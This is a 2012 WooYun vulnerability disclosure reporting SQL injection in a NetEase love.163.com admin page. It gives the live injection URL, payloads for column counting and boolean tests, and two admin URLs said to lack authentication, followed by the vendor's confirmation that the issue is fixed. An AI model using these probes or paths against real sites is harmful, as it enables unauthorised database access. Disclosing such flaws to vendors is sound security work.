漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-07769
漏洞标题:网易某频道注入
相关厂商:网易
漏洞作者: Jannock
提交时间:2012-06-01 11:26
修复时间:2012-07-16 11:26
公开时间:2012-07-16 11:26
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:5
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-06-01: 细节已通知厂商并且等待厂商处理中
2012-06-01: 厂商已经确认,细节仅向厂商公开
2012-06-11: 细节向核心白帽子及相关领域专家公开
2012-06-21: 细节向普通白帽子公开
2012-07-01: 细节向实习白帽子公开
2012-07-16: 细节向公众公开
简要描述:
网易某频道注入+某频道疑拟后台没认证。
详细说明:
注入点:
http://love.163.com/admin/sdetail2.jsp?pID=oyfxxg&uID=rongyu0507%27%20order%20by%204%23
正常:
http://love.163.com/admin/sdetail2.jsp?pID=oyfxxg&uID=rongyu0507%27%20and%201=1%23
错误:
http://love.163.com/admin/sdetail2.jsp?pID=oyfxxg&uID=rongyu0507%27%20and%201=2%23
可以用工具来猜,这里就不继续了。
疑拟后台没认证
http://tools.vip.163.com/business/dooland/admin/index.mx
http://count.mail.163.com/adclickrate/jsp/admin/generateTinyURL.jsp
漏洞证明:
修复方案:
应该懂!
版权声明:转载请注明来源 Jannock@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:5
确认时间:2012-06-01 18:28
厂商回复:
感谢您对网易的关注,已经修复。
最新状态:
暂无
漏洞评价:
评论
-
我说大神啊!等等身后的兄弟们啊!
-
@shine 小问题,不在于Rank
-
@Jannock 我决心超越你了!!!
-
@xsser come on
-
@Valo洛洛 语文没学好。。
-
@Valo洛洛 ~ 五笔, w 按到 r 上了
-
@gainover ......
-
@gainover 漏洞或错误逆向分析!你是个追求本质的人!哈哈!
( 普通白帽子 | Rank:831 漏洞数:77 | coder)